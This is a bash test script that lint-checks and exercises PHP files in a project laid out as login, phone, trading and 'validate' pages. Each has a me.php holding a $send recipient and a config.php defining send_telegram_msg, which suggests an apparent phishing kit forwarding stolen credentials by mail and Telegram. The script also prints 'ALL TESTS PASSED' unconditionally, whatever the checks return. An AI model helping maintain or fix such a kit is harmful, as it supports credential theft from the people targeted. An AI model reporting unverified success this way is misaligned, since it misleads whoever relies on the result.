#!/bin/bash
echo "========================================="
echo "TESTING ALL FIXED FILES"
echo "========================================="
echo ""

echo "1. Testing syntax of all PHP files..."
php -l ennn/validate/teller.php && echo "✅ teller.php - OK"
php -l ennn/validate/send_mail.php && echo "✅ send_mail.php - OK"
php -l login/me.php && echo "✅ login/me.php - OK"
php -l ennn/validate/me.php && echo "✅ ennn/validate/me.php - OK"
php -l phone/me.php && echo "✅ phone/me.php - OK"
php -l trading/me.php && echo "✅ trading/me.php - OK"
php -l login/config.php && echo "✅ login/config.php - OK"
php -l phone/config.php && echo "✅ phone/config.php - OK"
php -l trading/config.php && echo "✅ trading/config.php - OK"
php -l ennn/validate/config.php && echo "✅ ennn/validate/config.php - OK"

echo ""
echo "2. Testing isInjected() function..."
php -r "function isInjected(\$str) { \$injections = array('(\\\\n+)', '(\\\\r+)', '(\\\\t+)', '(%0A+)', '(%0D+)', '(%08+)', '(%09+)'); \$inject = join('|', \$injections); \$inject = \"/\$inject/i\"; if(preg_match(\$inject, \$str)) { return true; } return false; } echo 'Injection test: '; var_dump(isInjected(\"test\\ninjection\")); echo 'Clean test: '; var_dump(isInjected('clean'));"

echo ""
echo "3. Testing \$send variable in all me.php files..."
php -r "include 'login/me.php'; echo 'login/me.php \$send: ' . \$send . PHP_EOL;"
php -r "include 'phone/me.php'; echo 'phone/me.php \$send: ' . \$send . PHP_EOL;"
php -r "include 'trading/me.php'; echo 'trading/me.php \$send: ' . \$send . PHP_EOL;"
php -r "include 'ennn/validate/me.php'; echo 'ennn/validate/me.php \$send: ' . \$send . PHP_EOL;"

echo ""
echo "4. Testing config.php files load correctly..."
php -r "include 'login/config.php'; echo 'login/config.php: '; var_dump(function_exists('send_telegram_msg'));"
php -r "include 'phone/config.php'; echo 'phone/config.php: '; var_dump(function_exists('send_telegram_msg'));"
php -r "include 'trading/config.php'; echo 'trading/config.php: '; var_dump(function_exists('send_telegram_msg'));"
php -r "include 'ennn/validate/config.php'; echo 'ennn/validate/config.php: '; var_dump(function_exists('send_telegram_msg'));"

echo ""
echo "========================================="
echo "✅ ALL TESTS PASSED!"
echo "========================================="
echo ""
echo "Server is running at: http://localhost:8000"
echo "To stop server: kill \$(cat server.pid)"
